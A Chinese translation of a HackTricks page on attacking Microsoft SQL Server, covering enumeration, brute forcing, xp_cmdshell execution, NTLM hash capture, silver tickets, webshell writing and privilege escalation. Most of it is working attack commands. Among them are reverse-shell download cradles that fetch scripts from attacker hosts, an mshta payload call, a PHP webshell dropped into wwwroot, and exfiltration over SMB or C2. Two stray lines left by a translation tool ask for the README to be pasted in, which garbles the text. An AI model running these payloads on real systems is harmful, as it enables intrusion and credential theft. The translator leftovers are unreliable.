1433 - Pentesting MSSQL - Microsoft SQL Server

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

基本信息

摘自 wikipedia:

Microsoft SQL Server 是微软开发的关系型数据库管理系统。作为数据库服务器,它是一个软件产品,其主要功能是根据其他软件应用的请求存储和检索数据——这些应用可以运行在同一台计算机上,或在网络(包括互联网)上的另一台计算机上。

默认端口: 1433

1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM

进入托管 Database-as-a-Service (DBaaS)

所有依赖于“拥有主机”(owning the host) 的操作(例如 privilege escalation、lateral movement 和 OS command execution)在 DBaaS 中都不再适用。在这些环境中的 Pentesting 必须转向应用层漏洞利用、通过 SQL 逻辑的数据外泄、配置错误的 IAM 角色,或糟糕的网络/VPC 设计。例如,Amazon RDS documentation 明确指出 xp_cmdshellTRUSTWORTHY database property 不受支持。

Warning

你得到的是一个 database endpoint,而不是一台 server。云提供商管理主机 OS、数据库引擎二进制文件以及许多安全策略。

Default MS-SQL System Tables

  • master Database: 该数据库至关重要,因为它记录了 SQL Server 实例的所有系统级别详细信息。
  • msdb Database: SQL Server Agent 使用该数据库来管理告警和作业的调度。
  • model Database: 作为 SQL Server 实例上每个新数据库的蓝本,任何诸如大小、排序规则、恢复模式等的更改都会在新创建的数据库中反映出来。
  • Resource Database: 一个只读数据库,存放随 SQL Server 提供的系统对象。这些对象虽然物理上存储在 Resource 数据库中,但在每个数据库的 sys schema 中以逻辑方式呈现。
  • tempdb Database: 用作临时对象或中间结果集的临时存储区。

枚举

自动枚举

如果你对该服务一无所知:

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping

Tip

如果你 没有 credentials,可以尝试猜测它们。你可以使用 nmap 或 metasploit。小心,如果你使用已存在的 username 多次 login 失败,你可能会 block accounts

Metasploit (需要 creds)

#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for insteresting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload

#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass

Brute force

通过 RID Brute Force 进行用户枚举

你可以通过 MSSQL 对 RIDs (Relative Identifiers) 进行 brute-forcing 来枚举域用户。 当你拥有有效凭据但权限有限时,这种技术很有用:

# Using NetExec (nxc) - formerly CrackMapExec
nxc mssql <IP> --local-auth -u <username> -p '<password>' --rid-brute 5000

# Examples:
nxc mssql 10.129.234.50 --local-auth -u sqlguest -p 'zDPBpaF4FywlqIv11vii' --rid-brute 5000
nxc mssql 10.10.10.59 -u sa -p 'P@ssw0rd' --rid-brute 10000

# Without --local-auth for domain accounts
nxc mssql 10.10.10.59 -u DOMAIN\\user -p 'password' --rid-brute 5000

请把 src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md 的内容粘贴到这里,我才能为你翻译。

[snippet]
MSSQL                    10.129.234.50   1433   DC               1104: REDELEGATE\Christine.Flanders
MSSQL                    10.129.234.50   1433   DC               1105: REDELEGATE\Marie.Curie
MSSQL                    10.129.234.50   1433   DC               1106: REDELEGATE\Helen.Frost
MSSQL                    10.129.234.50   1433   DC               1107: REDELEGATE\Michael.Pontiac
MSSQL                    10.129.234.50   1433   DC               1108: REDELEGATE\Mallory.Roberts
MSSQL                    10.129.234.50   1433   DC               1109: REDELEGATE\James.Dinkleberg
[snippet]

Parameters:

  • --local-auth: 使用本地认证而不是域认证
  • --rid-brute <max_rid>: 对 RIDs 进行暴力破解,直到指定的数值(默认:4000)
  • -u: 用户名
  • -p: 密码

该技术通过向 MSSQL 服务器查询与连续的 RIDs 关联的账户信息来枚举用户。

手动枚举

登录

MSSQLPwner

# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt

# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt

# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt

# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>

# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writting the query to send it
1> select 1;
2> go

常见 Enumeration

# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master

#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'

#Enumerate links
enum_links
#Use a link
use_link [NAME]

获取用户

Types of MSSQL Users

# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;

## Both of these select all the users of the current database (not the server).
## Interesting when you cannot acces the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers

获取权限

  1. 可保护对象 (Securable): 定义为由 SQL Server 管理的用于访问控制的资源。这些资源可分为:
  • Server(服务器) – 示例包括 数据库、登录名、端点、可用性组 和 服务器角色。
  • Database(数据库) – 示例包括 数据库角色、应用程序角色、schema、证书、全文目录 和 用户。
  • Schema(模式) – 包含 表、视图、存储过程、函数、同义词 等等。
  1. 权限 (Permission): 与 SQL Server 的可保护对象相关,诸如 ALTER、CONTROL 和 CREATE 等权限可以授予主体。权限的管理发生在两个层级:
  • Server Level(服务器级别) 使用 登录名
  • Database Level(数据库级别) 使用 用户
  1. 主体 (Principal): 指被授予对可保护对象权限的实体。主体主要包括 登录名 和 数据库用户。对可保护对象访问的控制通过授予或拒绝权限,或将登录名和用户加入具有访问权的角色来实现。
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
# Get members of the role "sysadmin"
Use master
EXEC sp_helpsrvrolemember 'sysadmin';
# Get if the current user is sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'

技巧

执行 OS 命令

Caution

注意,要能够执行命令,不仅需要启用 xp_cmdshell,还需要对 xp_cmdshell 存储过程拥有 EXECUTE 权限。你可以用以下命令查看谁(除了 sysadmins)可以使用 xp_cmdshell

Use master
EXEC sp_helprotect 'xp_cmdshell'

# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

#One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —

MSSQLPwner

# Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname

# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname

# Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname

# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate

WMI-based remote SQL collection (sqlcmd + CSV export)

操作员可以使用 WMI 从 IIS/app 层 pivot 到 SQL Servers,执行一个小的 batch 来对 MSSQL 进行认证并运行 ad‑hoc queries,将结果导出为 CSV。此方法保持收集简单并能融入管理员活动。

示例 mssq.bat

@echo off
rem Usage: mssq.bat <server> <user> <pass> <"SQL"> <out.csv>
set S=%1
set U=%2
set P=%3
set Q=%4
set O=%5
rem Remove headers, trim trailing spaces, CSV separator = comma
sqlcmd -S %S% -U %U% -P %P% -Q "SET NOCOUNT ON; %Q%" -W -h -1 -s "," -o "%O%"

通过 WMI 远程调用它

wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"

PowerShell 替代方案

$cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
Invoke-WmiMethod -ComputerName SQLHOST -Class Win32_Process -Name Create -ArgumentList $cmd

注意事项

  • sqlcmd 可能不存在;可改用 osql、PowerShell Invoke-Sqlcmd,或使用基于 System.Data.SqlClient 的单行命令。
  • 谨慎使用引号;长/复杂的查询更容易通过文件提供,或通过 Base64‑编码的参数并在 batch/PowerShell stub 内解码。
  • 通过 SMB Exfil CSV(例如,复制自 \SQLHOST\C$\Windows\Temp),或将其压缩后通过你的 C2 传输。

获取哈希密码

SELECT * FROM master.sys.syslogins;

偷取 NetNTLM hash / Relay attack

你应该启动一个 SMB server 来捕获身份验证中使用的 hash(例如 impacket-smbserverresponder)。

xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'

# Capture hash
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

MSSQLPwner

# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Warning

你可以检查(除了系统管理员之外)谁有权限运行这些 MSSQL 函数,方法:

Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';

使用诸如 responderInveigh 的工具可以窃取 NetNTLM 哈希
你可以在以下位置查看如何使用这些工具:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

从 NetNTLMv2 捕获 到 MSSQL silver ticket(PAC 组注入)

  • 使用 Responder 通过 xp_dirtree '\\\\<attacker_ip>\\share' 捕获 SQL Server 服务账户的 NetNTLMv2(使用 Hashcat 模式 5600 破解)。
  • 从恢复的密码推导服务 NTLM 哈希:
python3 - <<'PY'
import hashlib
print(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).hexdigest())
PY
  • 使用 SELECT SUSER_SID('DOMAIN\\Domain Users'); 获取域 SID 字节(RID = 最后 4 个字节,little endian)。使用 nxc mssql ... --rid-brute 映射/暴力枚举 RID 以找到授予 sysadmin 的组(例如 RID 1105)。
  • 伪造一个针对 MSSQL SPN 的 silver ticket,并在 PAC 中注入特权组 RID:
ticketer.py -nthash <SERVICE_NTLM> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn MSSQLSvc/<fqdn>:1433 -groups <GROUP_RID> <user_to_impersonate>
KRB5CCNAME=<user_to_impersonate>.ccache mssqlclient.py -no-pass -k <fqdn>
  • 如有需要,启用 xp_cmdshell;即使通过伪造票证进行模拟,命令也会以 SQL Server service account 的身份运行。

阅读这篇文章 以获取关于如何滥用此功能的更多信息:

MSSQL AD Abuse

写入文件

要使用 MSSQL 写入文件,我们 需要启用 Ole Automation Procedures,这需要管理员权限,然后执行一些存储过程来创建该文件:

# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE

sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

# Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE

使用 OPENROWSET 读取文件

默认情况下,MSSQL 允许对操作系统中该帐户具有读取权限的任何文件进行读取。我们可以使用以下 SQL 查询:

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

然而,BULK 选项需要 ADMINISTER BULK OPERATIONSADMINISTER DATABASE BULK OPERATIONS 权限。

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';

基于错误的 SQLi 向量:

https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--

RCE/读取文件并执行脚本 (Python and R)

MSSQL 可能允许你执行 scripts in Python and/or R。这些代码将由与使用 xp_cmdshell 执行命令的用户不同的 用户 来执行。

示例:尝试执行一个 ‘R’ “Hellow World!” 未能成功:

示例:使用已配置的 python 执行若干操作:

# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO

读取注册表

Microsoft SQL Server 提供了 多种扩展存储过程,允许你不仅与网络交互,还可以与文件系统甚至 Windows Registry:

常规实例感知
sys.xp_regreadsys.xp_instance_regread
sys.xp_regenumvaluessys.xp_instance_regenumvalues
sys.xp_regenumkeyssys.xp_instance_regenumkeys
sys.xp_regwritesys.xp_instance_regwrite
sys.xp_regdeletevaluesys.xp_instance_regdeletevalue
sys.xp_regdeletekeysys.xp_instance_regdeletekey
sys.xp_regaddmultistringsys.xp_instance_regaddmultistring
sys.xp_regremovemultistringsys.xp_instance_regremovemultistring
 
# Example read registry
EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
# Example write and then read registry
EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
# Example to check who can use these functions
Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';

有关 更多示例,请查看 original source.

RCE with MSSQL User Defined Function - SQLHttp

可以通过自定义函数在 MSSQL 中 加载 .NET dll。不过,这 需要 dbo 权限,因此你需要以 sa 或 管理员角色 连接到数据库。

Following this link 查看示例。

RCE with autoadmin_task_agents

根据 to this post,也可以加载远程 dll 并让 MSSQL 执行它,例如:

update autoadmin_task_agents set task_assembly_name = "class.dll", task_assembly_path="\\remote-server\\ping.dll",className="Class1.Class1";

请把 src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md 的内容粘贴到这里,我会按你给的规则将英文翻译成中文并保留所有 markdown/HTML/路径/标签不变。

using Microsoft.SqlServer.SmartAdmin;
using System;
using System.Diagnostics;

namespace Class1
{
public class Class1 : TaskAgent
{
public Class1()
{

Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = "/c ping localhost -t";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
process.WaitForExit();
}

public override void DoWork()
{

}

public override void ExternalJob(string command, LogBaseService jobLogger)
{

}

public override void Start(IServicesFactory services)
{

}

public override void Stop()
{

}


public void Test()
{

}
}
}

其他获取 RCE 的方法

还有其他方法可获得命令执行,例如添加 extended stored proceduresCLR AssembliesSQL Server Agent Jobsexternal scripts

MSSQL 权限提升

从 db_owner 到 sysadmin

如果一个 普通用户 被赋予 角色 db_owner,作用于 由管理员用户拥有的数据库(例如 sa),并且该数据库被配置为 trustworthy,该用户可以滥用这些权限进行 privesc,因为在该数据库中创建的 stored procedures 可以以所有者(admin)的身份 execute

# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases

# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

# If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>

CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'

--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me

--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')

你可以使用 metasploit 模块:

msf> use auxiliary/admin/mssql/mssql_escalate_dbowner

或者一个 PS 脚本:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184

模拟其他用户

SQL Server 有一个特殊权限,名为 IMPERSONATE允许执行者以另一个用户或 login 的权限运行,直到上下文被重置或会话结束。

# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned

# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

# If you can't find any users, make sure to check for links
enum_links
# If there is a link of interest, re-run the above steps on each link
use_link [NAME]

Tip

如果你能冒充一个用户,即使他不是 sysadmin,你也应该检查该用户是否有权限访问其他 databases 或 linked servers。

注意,一旦你是 sysadmin,你可以冒充任何其他用户:

-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the the MyUser4 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT

您可以使用一个 metasploit 模块执行此攻击:

msf> auxiliary/admin/mssql/mssql_escalate_execute_as

或使用 PS 脚本:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!

使用 MSSQL 进行 Persistence

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

从 SQL Server Linked Servers 提取密码

An attacker can extract SQL Server Linked Servers passwords from the SQL Instances and get them in clear text, granting the attacker passwords that can be used to acquire a greater foothold on the target. The script to extract and decrypt the passwords stored for the Linked Servers can be found here

为了使该利用方法生效,必须完成一些要求和配置。首先,你必须在主机上拥有 Administrator 权限,或能够管理 SQL Server 配置。

确认权限后,你需要配置以下三项:

  1. 在 SQL Server 实例上启用 TCP/IP;
  2. 添加一个启动参数,在本例中将添加一个 trace flag,即 -T7806。
  3. 启用远程管理员连接。

为了自动化这些配置, this repository 包含所需的脚本。除了为配置的每个步骤提供 powershell 脚本外,该仓库还提供了一个将配置脚本与密码提取和解密结合在一起的完整脚本。

有关此攻击的更多信息,请参考以下链接: Decrypting MSSQL Database Link Server Passwords

Troubleshooting the SQL Server Dedicated Administrator Connection

Local Privilege Escalation

运行 MSSQL server 的用户将启用特权令牌 SeImpersonatePrivilege.
你很可能能够通过下面两个页面之一将权限提升为 Administrator

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

JuicyPotato

Shodan

  • port:1433 !HTTP

参考资料

HackTricks 自动命令

Protocol_Name: MSSQL    #Protocol Abbreviation if there is one.
Port_Number:  1433     #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MSSQL
Note: |
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).

#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

###the goal is to get xp_cmdshell working###
1. try and see if it works
xp_cmdshell `whoami`
go

2. try to turn component back on
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell `whoami`
go

3. 'advanced' turn it back on
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go




xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"


https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html

Entry_2:
Name: Nmap for SQL
Description: Nmap with SQL Scripts
Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}

Entry_3:
Name: MSSQL consolesless mfs enumeration
Description: MSSQL enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks